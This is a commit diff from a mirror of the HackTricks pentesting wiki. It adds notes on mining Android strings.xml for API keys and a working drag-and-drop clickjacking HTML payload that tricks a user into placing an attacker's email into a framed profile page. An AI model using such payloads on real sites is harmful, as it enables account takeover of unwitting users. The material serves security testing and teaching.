Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 2 pages modified

Browse source
This commit is contained in:
CPol 2020-10-13 11:29:54 +00:00 committed by gitbook-bot
parent b1b610b969
commit f1bf48f1df
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 45 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
mobile-apps-pentesting/android-app-pentesting/README.md
View file

@ -13,6 +13,8 @@ This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\
* Android applications are in the _APK file format_. APK is basically a ZIP file. \(You can rename the file extension to .zip and use unzip to open and see its contents.\)
* APK Contents \(Not exhaustive\)
* AndroidManifest.xml
* resources.arsc/strings.xml
* res/xml/files\_paths.xml
* META-INF/
* Certificate lives here!
* classes.dex
@ -237,7 +239,7 @@ Just taking a look to the **strings** of the APK you can search for **passwords*
Pay special attention to **firebase URLs** and check if it is bad configured. [More information about whats is FIrebase and how to exploit it here.](../../pentesting/pentesting-web/buckets/firebase-database.md)
### Basic understanding of the application - Manifest.xml
### Basic understanding of the application - Manifest.xml, strings.xml
Using any of the **decompilers** mentioned [**here** ](apk-decompilers.md)you will be able to read the _Manifest.xml_. You could also **rename** the **apk** file extension **to .zip** and **unzip** it.
Reading the **manifest** you can find **vulnerabilities**:
@ -255,6 +257,12 @@ Reading the **manifest** you can find **vulnerabilities**:
* **Broadcast Receivers**: [You will learn how you can possibly exploit them](./#exploiting-broadcast-receivers) during the dynamic analysis.
* **URL scheme**: Read the code of the activity managing the schema and look for vulnerabilities managing the input of the user. More info about [what is an URL scheme here](./#url-schemes).
Reading **resources.arsc/strings.xml** you can find some **interesting info**:
* API Keys
* Custom schemas
* Other interesting info developers save in this file
### Insecure data storage
#### Internal Storage

37
pentesting-web/clickjacking.md
View file

@ -6,7 +6,11 @@ Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage
### Prepopulate forms trick
Sometimes is possible to fill the value of fields of a form using GET parameters when loading a page. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.
Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.
### Populate form with Drag&Drop
If you need the user to **fill a form** but you don't want to directly ask him to write some specific information \(like your email or and specific password that you know\), you can just ask him to **Drag&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).
### Basic Payload
@ -56,6 +60,37 @@ Sometimes is possible to fill the value of fields of a form using GET parameters
<iframe src="https://vulnerable.net/account"></iframe>
```
### Drag&Drop + Click payload
```markup
<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>
```
### XSS + Clickjacking
If you have identified a **XSS attack that requires a user to click** on some element to **trigger** the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.